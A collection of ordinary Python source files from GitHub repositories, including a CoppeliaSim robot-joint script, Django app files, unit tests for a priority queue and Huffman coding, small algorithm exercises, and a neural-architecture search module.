| 2021-05-07T07:01:16
| 365,143,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 617
|
py
|
import sim
import math
import time
SERVER_ADDRESS = '127.0.0.1'
PORT = 10009
# PORT = 19999
# Close any existing connections, just in case
sim.simxFinish(-1)
# Connect to CoppeliaSim
client_id = sim.simxStart(SERVER_ADDRESS, PORT, True, True, 5000, 5)
if client_id == -1:
    print('Could not connect')
# Get a handle to the axis (joint)
AXIS_NAME = 'MTB_axis1#1'
ret,axis=sim.simxGetObjectHandle(client_id, AXIS_NAME, sim.simx_opmode_blocking)
# Move the axis to the target angle
value_degree = 180
value_radians = math.radians(value_degree)
sim.simxSetJointTargetPosition(client_id, axis, value_radians, sim.simx_opmode_oneshot)
time.sleep(1)
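# --- Illustrative sketch (not part of the original script) ---
# Reading the joint angle back and closing the connection; this assumes the
# standard legacy remote-API calls simxGetJointPosition and simxFinish.
if client_id != -1:
    ret, position = sim.simxGetJointPosition(client_id, axis, sim.simx_opmode_blocking)
    print('Current joint angle (degrees):', math.degrees(position))
    sim.simxFinish(client_id)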
|
[
"guitartsword@gmail.com"
] |
guitartsword@gmail.com
|
20862d69a7cc2ae87501cca23cc5706c63629912
|
07c131afa3426b7c511f11c247a005bbe0bc21ce
|
/src/manage.py
|
c58f18e48e3c72144dd995df5385b6c9c4f4c2bc
|
[] |
no_license
|
arindamdas612/labelizer
|
85fba02b2496a5783d5315bb80f0e32f1947268c
|
9f12c61bd3ec9ca476999e2c678bd5564e12d5ba
|
refs/heads/master
| 2022-12-01T18:29:45.873715
| 2020-07-13T15:32:38
| 2020-07-13T15:32:38
| 245,465,599
| 0
| 0
| null | 2022-11-22T05:22:32
| 2020-03-06T16:18:43
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'labelizer.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
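# Typical invocations, run from the directory containing manage.py:
#   python manage.py migrate
#   python manage.py runserver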
|
[
"arindamdas@Arindams-MacBook-Air.local"
] |
arindamdas@Arindams-MacBook-Air.local
|
e274b53ba1f53871673d32e9cc678f0f42fd2f7c
|
b88040d1d00d025de1fa96eac8af2d324291e6a2
|
/Assignment4/Assignment_4Tests.py
|
ee3bb0c077fd3ae619071679f0b2b92ae6630329
|
[] |
no_license
|
brianphan90/CPE202
|
5a1f59d4b20496e35bddc3e597a51d64fe829758
|
fe2bb58a8f177d32690b1fd1298125f684f3c0d6
|
refs/heads/master
| 2020-03-09T21:46:12.062397
| 2018-11-30T08:15:39
| 2018-11-30T08:15:39
| 129,018,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,745
|
py
|
from priorityqueue import *
from huffman import *
import unittest
class Asg4(unittest.TestCase):
def test_priorityqueue_1(self):
pq = PriorityQueue()
pq.enqueue('a', 0)
self.assertEqual(pq.front(), 'a')
pq.enqueue('b', 5)
self.assertEqual(pq.front(), 'b')
pq.enqueue('z', 100)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'z')
def test_priorityqueue_2(self):
pq = PriorityQueue()
pq.enqueue('a', 0)
self.assertEqual(pq.front(), 'a')
pq.enqueue('b', 5)
self.assertEqual(pq.front(), 'b')
pq.enqueue('z', 100)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZZZ', -10)
self.assertEqual(pq.front(), 'z')
def test_priorityqueue_3(self):
pq = PriorityQueue()
pq.enqueue('a', 0)
self.assertEqual(pq.front(), 'a')
pq.enqueue('b', 5)
self.assertEqual(pq.front(), 'b')
pq.enqueue('z', 100)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZZZ', 1000)
def test_priorityqueue_4(self):
pq = PriorityQueue()
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'ZZ')
pq.enqueue('ZZZZ', 1000)
self.assertEqual(pq.dequeue(), 'ZZZZ')
def test_priorityqueue_5(self):
pq = PriorityQueue()
pq.enqueue(list(), -1)
self.assertEqual(pq.front(), [])
        pq.enqueue(tuple([1,2,3]), 1000)
        pq.enqueue('bbc', 1000)
pq.enqueue(int('78'), 1000000)
self.assertEqual(pq.dequeue(), 78)
def test_huffman_1(self):
        sent = 'aaaaggccttt'
        codes = dict()
        root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'a': '0', 'g': '111', 'c': '110', 't': '10'})
def test_huffman_2(self):
        sent = 'asdf;k;lkjasdfk dasiirFFDg'
        codes = dict()
        root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, \
{'a': '001', 's': '100', 'd': '010', 'f': '1011', \
';': '1101', 'k': '011', 'l': '11100', 'j': \
'11111', ' ': '11000', 'i': '000', 'r': '11101',\
'F': '1010', 'D': '11001', 'g': '11110'})
def test_huffman_3(self):
        sent = 'asdf;k;lkjasdfk'
        codes = dict()
        root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'a': '100', 's': '011', 'd': '101', \
'f': '010', ';': '111', 'k': '00', \
'l': '1101', 'j': '1100'})
def test_huffman_4(self):
        sent = 'testing this string'
        codes = dict()
        root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'t': '01', 'e': '10110', 's': '111', \
'i': '110', 'n': '100', 'g': '001', ' ': '000', 'h': '10111', \
'r': '1010'} )
def test_huffman_5(self):
        sent = 'StringTeessttt'
        codes = dict()
        root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'S': '0100', 't': '11', 'r': \
'1001', 'i': '1011', 'n': '1000', 'g': '1010', 'T': '0101', \
'e': '011', 's': '00'})
if __name__ == '__main__':
unittest.main()
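# A whole message can be encoded with the same huffman()/get_huffman_code()
# API that the tests above exercise (codes as asserted in test_huffman_1):
#
#   root = huffman('aaaaggccttt')
#   encoded = ''.join(get_huffman_code(ch, root) for ch in 'aaaaggccttt')
#   # encoded == '0000111111110110101010'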
|
[
"noreply@github.com"
] |
brianphan90.noreply@github.com
|
2805e23589388f98356cdfb31d8b2c7f0ac9e81e
|
862cde78fa4b2e7a8043276d2a78a51715d66cf9
|
/CSC-Python-2021-1/I/I.py
|
174e25cfc98aece92a23ff81be78e2e0cc09223e
|
[
"MIT"
] |
permissive
|
coldnegative/CSC-Python-2021
|
8c21c639f4dbf0f7c337349fdc8d6300b45abc9d
|
aee9acb4e1fc3afab4d88d6c6a9a22363f52b321
|
refs/heads/main
| 2023-03-06T23:46:37.075471
| 2021-02-21T08:38:13
| 2021-02-21T08:38:13
| 339,986,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def writer(line):
with open("output.txt", "a") as f:
f.write(line)
def main():
"""Дан секвенированный геном какого-либо вируса.
Нужно определить количество нуклеотидов a c g t
в геноме в таком порядке."""
# Code goes over here.
count_a = 0
count_c = 0
count_g = 0
count_t = 0
with open("input.txt") as f:
for line in f:
for x in "".join(line[10:].split()):
if x == "a":
count_a += 1
elif x == "c":
count_c += 1
elif x == "g":
count_g += 1
elif x == "t":
count_t += 1
else:
writer("{} {} {} {}\n".format(count_a, count_c, count_g, count_t))
return 0
if __name__ == "__main__":
main()
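# --- Illustrative sketch (not part of the original script) ---
# Equivalent counting with str.count, assuming the same input layout (the
# first 10 characters of each line are a position prefix that is skipped):
#
#   seq = "".join("".join(line[10:].split()) for line in open("input.txt"))
#   print(seq.count("a"), seq.count("c"), seq.count("g"), seq.count("t"))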
|
[
"vologinmp@gmail.com"
] |
vologinmp@gmail.com
|
8edce78411cf51da5c3597e357ac88e57e917f26
|
319e87285382cf54c844cb1ff80ffdcb4a4b4b70
|
/algorithm/others/coin_change_hieu.py
|
d6437626d91c35d4a986c758329c76e814cceb8b
|
[] |
no_license
|
chaupmcs/python_practice
|
5473926a29661ec8da21fba4a41dce8b5581350d
|
f25105d0aea40ebc1015fe8e39dcb0cd1dcd044d
|
refs/heads/master
| 2020-05-27T10:34:52.409083
| 2019-05-26T03:55:51
| 2019-05-26T03:55:51
| 188,584,639
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 950
|
py
|
"""
Created by chaupm at 2019-05-17
"""
import math
class Solution:
def coinChange(self, coins, amount):
def countStep(subAmount, map):
min_of_list = math.inf
for coin in coins:
if (subAmount - coin) in map:
min_of_list = min(map[(subAmount - coin)], min_of_list)
map[subAmount] = min_of_list + 1
if amount == 0:
return 0
map = {}
for coin in coins:
map[coin] = 1
for i in range(1, amount + 1):
if i not in coins:
countStep(i, map)
result = map.get(amount, -1)
# unreachable amounts end up as math.inf in the table; report them as -1
return -1 if result == math.inf else result
def a(map_, list_ = None):
if list_ is not None:
list_.append("haha")
map_["xx"] = 100
map___ = {10:10000}
list___ = ["aa"]
a(map___, list___)
a(map___, list___)
print(map___)
print(list___)
coins = [1,2,5]
amount = 11
test = Solution()
print(test.coinChange(coins, amount))
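# Expected output of the demo above: {10: 10000, 'xx': 100}, then
# ['aa', 'haha', 'haha'] (both calls to a() mutate the same dict/list objects,
# since arguments are passed by reference), and finally 3 for
# coinChange([1, 2, 5], 11) -- e.g. 5 + 5 + 1.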
|
[
"chaupm.cs@gmail.com"
] |
chaupm.cs@gmail.com
|
0752d8ac03b45b74c1e14728a331fb012029a3c9
|
05a70c12df808455100598d8a6fdb5635c641ab8
|
/Ago-Dic-2019/JOSE ONOFRE/SegundoParcial/ApiDisco.py
|
dabba11527d0d7d17a81d67cbb7e88b14651cfd4
|
[
"MIT"
] |
permissive
|
Jonathan-aguilar/DAS_Sistemas
|
991edcc929c33ba9bb8bc84e741b55c10a8420a3
|
4d02efc64161871084df1bff258112351e5d1241
|
refs/heads/development
| 2023-07-24T12:26:54.698452
| 2021-09-02T20:52:26
| 2021-09-02T20:52:26
| 289,764,892
| 1
| 0
|
MIT
| 2021-09-02T20:52:27
| 2020-08-23T20:54:55
|
Python
|
UTF-8
|
Python
| false
| false
| 973
|
py
|
import musicbrainzngs
import pprint
import sqlite3
import ClaseDisco
import BDMusic
musicbrainzngs.set_useragent('musicbrainzngs','2.0')
#r = musicbrainzngs.search_artists(query='area.name:Los Angeles',limit=5)
r = musicbrainzngs.search_releases(type = "group", country = 'US', tag=['rock','metal'],limit= 100)
for discos in r['release-list']:
if 'status' in discos:
stat = discos['status']
else:
stat = 'Unofficial'
disc = ClaseDisco.Disc(id = discos['artist-credit'][0]['artist']['id'],name = discos['artist-credit'][0]['artist']['name'], country = discos['country'], date = discos['date'], status = stat)
#pprint.pprint(discos['artist-credit'][0]['artist']['id'])
#pprint.pprint(discos['artist-credit'][0]['artist']['name'])
#pprint.pprint(discos['country'])
#pprint.pprint(discos['date'])
#pprint.pprint(discos['status'])
print(disc)
#BDMusic.insertarD(disc)
BDMusic.VisualizarD()  # display the stored discs (assumes VisualizarD is a callable in BDMusic)
#pprint.pprint(r)
|
[
"onofreeduardos@gmail.com"
] |
onofreeduardos@gmail.com
|
5adac1321b757ffa1b6144b1fdd7c78c5b76e4d6
|
ff5892487c262ce845a9996a282d3a2fdb1a3b15
|
/URI_2651.py
|
af43f3470162a3a2559044957f9345503771e9ee
|
[] |
no_license
|
dankoga/URIOnlineJudge--Python-3.9
|
d424a47671f106d665a4e255382fc0ec3059096a
|
f1c99521caeff59be0843af5f63a74013b63f7f0
|
refs/heads/master
| 2023-07-15T08:32:11.040426
| 2021-09-03T13:27:17
| 2021-09-03T13:27:17
| 393,991,461
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
name = input().lower()
if 'zelda' in name:
print('Link Bolado')
else:
print('Link Tranquilo')
|
[
"dankoga2@gmail.com"
] |
dankoga2@gmail.com
|
fe854d01dea7173d612f68b1b08c4a296e3c2832
|
6599d86684020139574241cf88ab0966bfd11f27
|
/nas/greedy.py
|
d96a24441bd11756881fb61e4dd11c9622a3e5cf
|
[
"MIT"
] |
permissive
|
kepengxu/autokeras_cooper
|
54026798a038b469fff7a3db15583f7eb9e7c24b
|
960098d5e0691a0c16a16fc7641b23a29fd17f20
|
refs/heads/master
| 2022-11-25T09:57:20.377158
| 2019-03-25T13:41:02
| 2019-03-25T13:41:02
| 177,594,139
| 0
| 1
|
NOASSERTION
| 2022-11-03T14:02:10
| 2019-03-25T13:40:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,785
|
py
|
import time
from copy import deepcopy
from autokeras.custom_queue import Queue
from autokeras.bayesian import contain, SearchTree
from autokeras.net_transformer import transform
from autokeras.search import Searcher
class GreedyOptimizer:
def __init__(self, searcher, metric):
self.searcher = searcher
self.metric = metric
def generate(self, descriptors, timeout, sync_message):
"""Generate new neighbor architectures from the best model.
Args:
descriptors: All the searched neural architectures.
timeout: An integer. The time limit in seconds.
sync_message: the Queue for multiprocessing return value.
Returns:
out: A list of 2-elements tuple. Each tuple contains
an instance of Graph, a morphed neural network with weights
and the father node id in the search tree.
"""
out = []
start_time = time.time()
descriptors = deepcopy(descriptors)
if isinstance(sync_message, Queue) and sync_message.qsize() != 0:
return out
model_id = self.searcher.get_neighbour_best_model_id()
graph = self.searcher.load_model_by_id(model_id)
father_id = model_id
for temp_graph in transform(graph):
if contain(descriptors, temp_graph.extract_descriptor()):
continue
out.append((deepcopy(temp_graph), father_id))
remaining_time = timeout - (time.time() - start_time)
if remaining_time < 0:
raise TimeoutError
return out
class GreedySearcher(Searcher):
""" Class to search for neural architectures using Greedy search strategy.
Attribute:
optimizer: An instance of BayesianOptimizer.
"""
def __init__(self, n_output_node, input_shape, path, metric, loss, generators, verbose,
trainer_args=None,
default_model_len=None,
default_model_width=None):
super(GreedySearcher, self).__init__(n_output_node, input_shape,
path, metric, loss, generators,
verbose, trainer_args, default_model_len,
default_model_width)
self.optimizer = GreedyOptimizer(self, metric)
def generate(self, multiprocessing_queue):
"""Generate the next neural architecture.
Args:
multiprocessing_queue: the Queue for multiprocessing return value.
pass into the search algorithm for synchronizing
Returns:
results: A list of 2-element tuples. Each tuple contains an instance of Graph,
and anything to be saved in the training queue together with the architecture
"""
remaining_time = self._timeout - time.time()
results = self.optimizer.generate(self.descriptors, remaining_time,
multiprocessing_queue)
if not results:
new_father_id = 0
generated_graph = self.generators[0](self.n_classes, self.input_shape). \
generate(self.default_model_len, self.default_model_width)
results.append((generated_graph, new_father_id))
return results
def update(self, other_info, model_id, graph, metric_value):
return
def load_neighbour_best_model(self):
return self.load_model_by_id(self.get_neighbour_best_model_id())
def get_neighbour_best_model_id(self):
if self.metric.higher_better():
return max(self.neighbour_history, key=lambda x: x['metric_value'])['model_id']
return min(self.neighbour_history, key=lambda x: x['metric_value'])['model_id']
|
[
"xkp793003821@outlook.com"
] |
xkp793003821@outlook.com
|
96156d51e8cf1c52991bca0587c7c4bec623db93
|
3d5ff3f273cf5bf444db948e3d220e99b718217b
|
/books/models.py
|
a8fa20e1e8924101fbce1be0ab4ab46c052d8856
|
[] |
no_license
|
xinmang/myblog
|
b481dd3323dc5d687e30a7f50a9720899f517778
|
3e7f9ce5dcd05d83338f7c707e013ac2107c505d
|
refs/heads/master
| 2020-03-17T14:50:01.784759
| 2018-05-16T15:35:37
| 2018-05-16T15:35:37
| 133,687,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,266
|
py
|
from django.db import models
# Create your models here.
class Publisher(models.Model):
publisher_name = models.CharField(max_length=30)
address = models.CharField(max_length=50)
city = models.CharField(max_length=60)
province = models.CharField(max_length=30)
country = models.CharField(max_length=50)
website = models.URLField()
class Meta:
ordering = ('publisher_name',)
def __str__(self):
return self.publisher_name
class Auther(models.Model):
SEX = (
('M','Male'),
('F','Female'),
)
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
email_address = models.EmailField()
age = models.IntegerField()
sex = models.CharField(max_length=1,choices=SEX)
def __str__(self):
return '%s %s'%(self.first_name,self.last_name)
class Book(models.Model):
name = models.CharField(max_length=100)
pagenum = models.IntegerField()
price = models.DecimalField(max_digits=10,decimal_places=2)
auther = models.ManyToManyField(Auther)
publisher_name = models.ForeignKey(Publisher)
publication_time = models.DateField()
def __str__(self):
return self.name
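# Usage sketch (hypothetical data; assumes the models are migrated):
#   acme = Publisher.objects.create(publisher_name='Acme', address='1 Main St',
#                                   city='Springfield', province='IL',
#                                   country='USA', website='http://example.com')
#   Book.objects.filter(publisher_name=acme)   # all books from this publisher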
|
[
"xinmang@126.com"
] |
xinmang@126.com
|
d0d96ffa0a203583d64e7b115aebcb79275c7f5b
|
a4a4d4b20aaaf37f4ada190e2e1840ae09c835a9
|
/generator/group.py
|
c636120d033dc53344570ddcfe5d713c709d712a
|
[
"Apache-2.0"
] |
permissive
|
SvetlanaPopova/ironpython_training
|
9196988bbfcb402f06f81e5ed46ed41c2e0141ad
|
03bfd2762421267f428529193e8f7903d366fbf0
|
refs/heads/master
| 2021-01-10T21:21:08.299364
| 2015-07-29T17:35:22
| 2015-07-29T17:35:22
| 38,529,793
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,249
|
py
|
__author__ = 'User'
from model.group import Group
import random
import string
import os.path
import getopt
import sys
import time
import clr
clr.AddReferenceByName('Microsoft.Office.Interop.Excel') #, Version=0.0.0.0, Culture=neutral, PublicKeyToken=')
from Microsoft.Office.Interop import Excel
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of groups", "file"])
except getopt.GetoptError as err:
print(err)  # getopt provides no usage() helper, so just report the parsing error
sys.exit(2)
n = 5
f = "data/groups.xlsx"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string (prefix, maxlen):
symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
testdata = [Group(name="")] + [
Group(name=random_string("name", 10))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
excel = Excel.ApplicationClass()
excel.Visible = True
workbook = excel.Workbooks.Add()
sheet = workbook.ActiveSheet
for i in range(len(testdata)):
sheet.Range["A%s" % (i+1)].Value2=testdata[i].name
workbook.SaveAs(file)
time.sleep(10)
excel.Quit()
|
[
"sv_popova@bk.ru"
] |
sv_popova@bk.ru
|
20398891f864a11de2e3bee99bdc0ac437de2638
|
7239d389894613ef132edb1198a4f47cb2b65f92
|
/packages/python/plotly/plotly/graph_objs/scatterpolar/marker/colorbar/_title.py
|
9e4e94f0bf6dbe97eabb67d95ad3967be6f5d3d3
|
[
"MIT"
] |
permissive
|
fast3dd13sa/plotly.py
|
2169417b72481ff2937b5a9ce90d426cd1cccd80
|
e778c6b5e6ae9665d7a5e2ddb666f43806df3959
|
refs/heads/master
| 2022-04-26T01:11:46.345181
| 2020-04-27T19:49:56
| 2020-04-27T19:49:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,724
|
py
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scatterpolar.marker.colorbar"
_path_str = "scatterpolar.marker.colorbar.title"
_valid_props = {"font", "side", "text"}
# font
# ----
@property
def font(self):
"""
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.scatterpolar.marker.colorbar.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.scatterpolar.marker.colorbar.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# side
# ----
@property
def side(self):
"""
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of the color bar. Note that before the existence
of `title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.scatterpolar.m
arker.colorbar.Title`
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scatterpolar.marker.colorbar.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scatterpolar.marker.colorbar.Title`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("side", None)
_v = side if side is not None else _v
if _v is not None:
self["side"] = _v
_v = arg.pop("text", None)
_v = text if text is not None else _v
if _v is not None:
self["text"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
[
"noreply@github.com"
] |
fast3dd13sa.noreply@github.com
|
7911c77860d4e664161d0c1fa934ba137de8f04d
|
6e790a743b4fd4ebecd82124d72f0628ef81f179
|
/users/serializers.py
|
b3fffd1ff94dded25cf0a540190266e684baf40a
|
[] |
no_license
|
KJablonski08/building_futures_django
|
55e62f4b60f6faab6faeba92705d7ad1c7f94b40
|
94140d8bd728852ea7fcb3c0d720b90dd2983178
|
refs/heads/main
| 2023-02-16T17:18:38.911551
| 2021-01-19T02:49:07
| 2021-01-19T02:49:07
| 320,074,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
from djoser.serializers import UserCreateSerializer, UserSerializer
from rest_framework import serializers
from . import models
class UserCreateSerializer(UserCreateSerializer):
class Meta(UserCreateSerializer.Meta):
model = models.User
fields = ('id', 'email', 'username', 'password', 'name')
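# Typically wired up via djoser settings (an assumption about this project's
# settings.py), so the user-create endpoint accepts the extra 'name' field:
#   DJOSER = {'SERIALIZERS': {'user_create': 'users.serializers.UserCreateSerializer'}}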
|
[
"kjablonski08@gmail.com"
] |
kjablonski08@gmail.com
|
87e1c4b4185b8e365e5367441a058d90688eb348
|
6b62b8a84a7aba88d7404fc6270c00ac6ecc38e8
|
/Python/1_Python Projects/1.county_project/Automation Project Output Files/untitled-1.py
|
bc3b7d742b7c836a2cfe542c531355d43ab0b7d3
|
[] |
no_license
|
bharatpk/Aroha_Tecnology_Workspace
|
fbeb5a1b1ef846c25f094bfa2398c1b15889bd85
|
ebd6727b2ae637e7256531e3e48d663af1fd3932
|
refs/heads/master
| 2021-01-23T08:52:32.463143
| 2015-08-05T12:23:19
| 2015-08-05T12:23:19
| 39,793,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 381
|
py
|
import glob
class merge :
def mergingfiles():
read_files = glob.glob("*.txt")
with open("result.text", 'a') as outfile:
for f in read_files:
with open(f, "r") as infile:
outfile.write('\n'+infile.read())
mergingfiles()
|
[
"bharatpk0@gmail.com"
] |
bharatpk0@gmail.com
|
2bd24e25c4900d6cefe399aa6ac942dc2c4f9795
|
2b4ed6bab74a924cd4286b6714d763d0fcb2595e
|
/polls/urls.py
|
35ca91de5648fe61f1d8af90fba20e2d82d1dda4
|
[] |
no_license
|
karthikravinatha/mysite-demo
|
6e8e764ff477821b95b4a3df2d0a25081b438509
|
79126ca90111a016fd9e1e99e48f57ea15bb055d
|
refs/heads/master
| 2020-08-19T18:26:46.895233
| 2019-10-18T09:10:40
| 2019-10-18T09:10:40
| 215,942,818
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
from django.urls import path
from . import views
app_name = 'polls'
urlpatterns = [
path('',views.index,name='index'),
path('<int:question_id>/',views.detail,name='detail'),
path('<int:question_id>/result',views.results,name='results'),
path('<int:question_id>/vote',views.vote,name='vote'),
]
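# With the app included as path('polls/', include('polls.urls')) in the project
# urls.py (an assumption about the project configuration), these patterns resolve
# to e.g. /polls/, /polls/5/, /polls/5/result and /polls/5/vote.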
|
[
"kar@gmail.com"
] |
kar@gmail.com
|
dc6a678d7a3dfe622eefcf7d4dde2c4c36e08b56
|
3e4b01aa9ee1892726519cdca30336764fb32c46
|
/build/lib/octopus/plotting_module.py
|
40a50bc2ad194ababca1c39ee6ddb268a7600813
|
[] |
no_license
|
copperwire/cephalopod
|
8376902d22871e1358b304dc12df029553f2b7e1
|
d06a8c65d4084ab3a3c5d582b9a63f705e6445b9
|
refs/heads/master
| 2021-01-15T15:25:47.312018
| 2016-06-14T23:39:34
| 2016-06-14T23:39:34
| 53,581,103
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,815
|
py
|
from octopus import file_handler
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import host_subplot
import mpl_toolkits.axisartist as AA
import numpy as np
class plotter:
def __init__(self, filename):
self.filename = filename
def pathfinder(self):
"""Find full path to filename """
def plot_machine(self):
class_instance = file_handler(self.filename)
class_instance.file_iteration()
data_sets = class_instance.data_conversion()
names = getattr(class_instance, "substances")
if len(names) > 2:
host = host_subplot(111, axes_class = AA.Axes)
plt.subplots_adjust(right = 0.75)
par1 = host.twinx()
par2 = host.twinx()
host.set_yscale("log")
par1.set_yscale("log")
par2.set_yscale("log")
offset = 60
new_fixed_axis = par2.get_grid_helper().new_fixed_axis
par2.axis["right"] = new_fixed_axis(loc="right",
axes=par2,
offset=(offset, 0))
par2.axis["right"].toggle(all = True)
host.set_xlabel(data_sets[0]["x_unit"])
plotty_things = [host, par1, par2]
for data_set, name, things in zip(data_sets, names, plotty_things):
x_val = data_set["data"]["x"]
y_val = data_set["data"]["y"]
x_unit = data_set["x_unit"]
y_unit = data_set["y_unit"]
things.set_ylabel(y_unit)
things.plot(x_val, y_val, label = data_set["sample element"])
plt.legend()
plt.show()
else:
data_set = data_sets[0]
x_val = data_set["data"][0]
y_val = data_set["data"][1]
x_val = x_val.copy(order = "C")
x_unit = data_set["x_unit"]
y_unit = data_set["y_unit"]
plt.semilogy(x_val, y_val, label = data_set["sample info"][2], nonposy = "clip")
plt.xlabel(x_unit)
plt.ylabel(y_unit)
plt.legend()
plt.show()
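# Usage sketch (the filename is illustrative; file_handler defines the accepted format):
#   plotter("measurement.txt").plot_machine()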
|
[
"solli.robert@gmail.com"
] |
solli.robert@gmail.com
|
8b834d6d57bdf5ca4ab43efb2e26e1f0348cd261
|
3c80780a7549e23312dd2e134503bda9a1a068a4
|
/DjangoWebProject5/home/views.py
|
36d531aabdc125e9f2ef5c3967371eae8cadcefe
|
[] |
no_license
|
halilibrahimm/Django-Post-Web-Application
|
c77333b9baa8341def1e60ea3034217f3c8670ff
|
e7f0b228c97b75fa57b5c7ef6f46c65e6539f148
|
refs/heads/master
| 2020-04-11T00:27:42.448132
| 2018-12-11T21:39:56
| 2018-12-11T21:39:56
| 161,387,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
from django.shortcuts import render,HttpResponse
def home_view(request):
if request.user.is_authenticated():
context={'isim':'Halil'}
else:
context={'isim':'Misafir'}
return render(request,'home.html',context)
# Create your views here.
|
[
"email@example.com"
] |
email@example.com
|
9bb4920df1debf2188236368aa71663f6901038b
|
96aa81997f7f59f3c5062a3c5a9424d351762c77
|
/covid19/covid19/settings.py
|
0c1a52d196628bd4faaa7d07c159b020b92883b0
